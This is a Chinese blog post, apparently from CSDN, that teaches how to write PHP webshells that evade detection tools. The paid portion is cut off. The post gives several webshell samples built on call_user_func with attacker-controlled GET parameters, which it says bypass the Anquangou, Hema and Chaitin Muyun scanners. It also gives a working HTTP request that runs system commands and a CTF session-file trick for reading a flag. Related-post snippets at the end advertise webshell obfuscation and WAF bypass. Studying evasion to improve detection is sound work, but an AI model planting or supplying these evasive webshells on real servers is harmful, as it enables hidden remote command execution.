网络安全-webshell绕过,hash碰撞,webshell绕过原理

已于 2024-09-21 18:33:53 修改
阅读量1.6k 收藏 15
点赞数 31
分类专栏: 网络安全 文章标签: 前端 javascript 开发语言
于 2024-09-21 12:09:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68976043/article/details/142388188
版权

目录

一、题目

1.1

1.2 

1.3

1.4

1.5

二、绕过动态检测引擎的一次尝试

三、一个比赛中的webshell

四、webshell绕过的原理以及哈希碰撞

五、JSP解释流程导致的绕过(QT比赛)

5.1环境

5.2例子

一、题目

这里我们通过几道题目来给大家讲解

1.1

<?php

$action = $_GET['action'];
$parameters = $_GET;
if (isset($parameters['action'])) {
    unset($parameters['action']);
}

$a = call_user_func($action, ...$parameters);

我这里找了几个市面上免费的查杀webshell的软件如安全狗和河马我们先来看看安全狗下面

 

看看河马

当然,这只是两款免费的webshell查杀工具,当前我们算是绕过了,但如果是花钱买的,这个动态传参多半是可以监控到的,因为用户可以控制,至少免费的绕过了,如何去利用呢,call_user_func老朋友了,回调函数

首先我们看代码里面没有关键词,没有eval,assert这样的函数,首先代码call_user_func后面的...代表接收不定项参数跟我们之前的usort一样,在我之前的文章中有提到过,变长参数

那知道这个点后,我们可以直接变长参数调用,很明显躲过了webshell的查杀,究其原因就是action是system而,...$parameters是接收所有get参数

1.2 

<?php

$action = $_GET['action'];
$parameters = $_GET;
if (isset($parameters['action'])) {
    unset($parameters['action']);
}

call_user_func($action, $parameters)($_POST['a'])($_POST['b']);

和之前的webshell不太一样多了一个($_POST['a'])和($_POST['b']),那这个代码怎么利用呢

看看字典,这个又和我们现在这个有什么关系

我们来看看current这个函数,返回当前数组当前值

那我们先这样传值看会报什么错,说少一个参数

 打印一下,很明显current打印出来实际上是一个数组

 那既然这样我们怎么去处理呢,这个是非常巧妙的current是返回当前数组的元素,也就是当前数组的值current,此时它就从current重新变成了current($_POST[a])($_POST[b]),变成它a是一个数组,b就是你的任意命令

除了这个解法以外还有其他解法没,将普通函数转换为闭包,其实这两个方法整体思路差不多

POST /x.php?action=Closure::fromCallable&0=Closure&1=fromCallable HTTP/1.1
Host: x

a=system&b=ls

而我们也可以看到长亭的牧云webshell社区版也是无法监测出来的

1.3

<?php
$action = $_GET['action'];
$parameters = $_GET;
if (isset($parameters['action'])) {
    unset($parameters['action']);
}

call_user_func($action, $parameters);


if(count(glob(__DIR__.'/*'))>3){
    readfile('flag.txt');
}

?>

底下有个flag.txt我们需要读出来,而必须文件大于3才可以读出来,那我们的目标就是创建文件

我们来看一个函数,启动或重用一个函数

 由于我们call_user_func()没有自动传值,所以我们代码自动报错了,它报错给了我们一个很关键的信息,给了我们物理路径

所以我们看起session_start并把sava_path定义成它的物理路径

 很明显多出来一个文件,那现在只有三个文件还是不行,肯定我们还想它再执行一个文件,cookie改一下不就可以做到,生成一个新的session文件

最低0.47元/天 解锁文章
红队攻防渗透技术实战流程:红队目标上线之免杀对抗-Webshell篇&魔改哥斯拉&打乱特征指纹&新增后门混淆&过云查杀&过流量识别
HACKONE的博客
06-30 622
这下面的逻辑就是我们再使用模式PHP_XOR_RAW和 PHP_XOR_BASE64生成木马时,会先通过代码中的genenrate找到template模板下的木马文件。通过替换密钥和key后直接按照template模板下的木马生成wenshell,所以我们把原来木马的模板替换成免杀的模板后,替换密钥和key后可直接生成免杀马。setting是控制下面显示的界面 asseet是实现端口扫描的,php目录下的文件是界面的显示的东西。这里定义的生成类,就是要找template下的生成文件。
IP-guard WebServer 权限绕过漏洞复现(QVD-2024-14103)
huangyongkang666的博客
04-24 2022
IP-guard 是由广州市溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。由于IP-guard WebServer的权限验证机制中存在设计缺陷,远程攻击者能够规避安全验证,通过后端接口执行文件的任意读取和删除操作
webshell绕过样本初体验
qq_64302290的博客
09-02 1022
在我们日常的网站中百分之一百是存在一些安全设备来拦截我们的webshell的,一般情况下不可能裸奔,一些比较好用的免费waf通常为安全狗,长亭科技的雷池waf等。当我们上传的webshell被查杀出来以后就直接失效。提供以下几种样本来绕过webshell的检测,并且亲测可以绕过安全狗和雷池。
Hash问题----Hash数组绕过
weixin_33804990的博客
11-19 342
等待笔记。。。 转载于:https://www.cnblogs.com/AardWolf/p/9986641.html
WebShell详解:原理、分类、攻击与防御
最新发布
w2361734601的博客
04-10 901
​​WebShell​​是一种以ASP、PHP、JSP等网页脚本形式存在的恶意代码执行环境,本质上是黑客通过Web服务端口(如80/443)获取服务器操作权限的工具。其名称中“Web”指需服务器开放Web服务,“Shell”表示通过脚本实现对服务器的命令控制。​​服务器管理​​:合法用途下,可用于文件上传/下载、数据库操作等。​​后门控制​​:被黑客利用后,可执行系统命令、窃取数据、植入病毒,甚至提权至Root权限。​​隐蔽性​。
记一次学习--webshell绕过
banliyaoguai的博客
08-31 1094
这道题目要读取flag,且当前目录下的文件数目要大于三才可以读取,然后这里的思路就是创建文件。上面题目,下面的call_user_func有一个可变长参数,这个可变长参数是$parameters然后上面有一个if语句判断$parameters是否有action,如果有就删除掉,然后再action参数传system,在parameters传你要执行的命令。我们这里也要想办法利用A中的f,这个就要利用ob_start,ob_start调用例子,这里和call_user_func调用差不多。
Upload-labs Pass07-Pass10 WebShell的简单绕过上传
qq_44846097的博客
01-03 2784
Pass07 绕过思路:后缀添加“.”绕过。 Pass08 绕过思路:后缀添加“::$DATA绕过”大小写绕过。 Pass09 绕过思路:后缀添加“. .”点空格点绕过。 Pass10 绕过思路:后缀更改".pphpphp"绕过
webshell是什么?网络安全攻防之webshell攻击!
Galaxy_0的博客
12-29 5833
Webshell是黑客经常使用的一种恶意脚本,其目的是获得服务器的执行操作权限,常见的webshell编写语言为asp、jsp和php。比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。黑客通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。
Webshell机制绕过的个人理解总结
Thewei666的博客
09-21 1228
在字符串中拼接变量执行php??a=id免杀手段的主要利用原理就是混淆代码、更改执行位置等,通过让检查机制混淆检查的结果,从而误认为该文件无害。因为为了提高检查的效率和降低误报率,WAF等安全产品是存在一定的缺陷,并不会检查彻底,例如溯源查找有次数限制等等,那我们通过足够长的嵌套是有可能逃出查杀。
waf绕过方法总结
gugonggugong的博客
12-30 3104
一、WAF防护原理 1. bypass 客户端JavaScript校验;服务器校验;文件内容头字段、编码校验;后缀名黑名单校验;自定义正则校验;waf设备校验; 有些waf不会防asp/php/jsp后缀文件,但是他会检测里面的文件; WTS-WAF bypass ; baidu colud bypass; aliyun waf; 安全狗上传bypass;云锁上传bypass; 2. defense ...
渗透测试 | php的webshell绕过方法总结
2301_80115097的博客
12-26 638
这里设置一个用户自定义函数a,当里面有参数时,返回该参数的内容,这里shell里的a($_REQUEST)[1] 的实际效果为 a($_REQUEST),相当于是a($a),会返回$a的内容,结果为$_REQUEST,最后一行的实际内容为eval($_REQUEST[1]);测试可以正常连接phpclass User?
hashcat密钥碰撞工具
08-27
hashcat密钥碰撞,无需安装,CMD下执行即可。CMD下执行即可。
单哈希值碰撞工具.exe
06-08
哈希值碰撞工具,通过哈希值,逆向计算出哈希文本,MD5值 。计算机,以及游戏常用的储存数据手段,
各种webshell
08-21
目前非常全的webshell,适合安全爱好者使用,其中工具涉及问题请自行负责。
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话拿webshell,然后用菜刀连接即可
常见 Webshell 的检测方法及检测绕过思路
niuyisheng的专栏
09-22 6897
Webshell的因素 我们从一个最简单的webshell结构可以看出其基本结构:“” 从目前被公布的一句话webshell来看,基本都符合这个结构,即shell的实现需要两步:数据的传递、执行所传递的数据。 数据传递&绕过检测 对于数据传递,我们通常的做法是使用$_GET、$_POST、$_SERVER、$_COOKIE等获取客户端数据。但这类关键词如果直接出现的
PHP中hash绕过和常用函数
qq_42739469的博客
11-05 692
引言:在ctf比赛中常常会涉及到一些哈希密码的绕过问题。今天基于一些PHP的特性,记录一些绕过方法。
md5绕过 Hash比较缺陷
qq_43679670的博客
11-14 531
md5绕过 Hash比较缺陷
webshell
06-22 4239
/csvpa/xscd.asp|-7 /plus/mytag_js.php?aid=8080|vales /aspnet_client/system_web/2_0_50727/Thumbs.aSpX|0xff /photo/indax.php|-7 /caches/d09b32391c15cefe6b7a9f55c56c1ef0.php|1 /plus/mytag_js.php?aid=9527|diaosi /plus/mytag_js.php?aid=9191|laobiao /plus/mytag.
河马查询webshell
03-14
### 关于河马查询 WebShell 工具 河马 WebShell 查杀工具是一种高效的恶意脚本检测工具,其核心功能基于海量的 WebShell 样本库和自主开发的技术实现[^1]。该工具采用了 **传统特征匹配** 和 **云端大数据分析** 的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值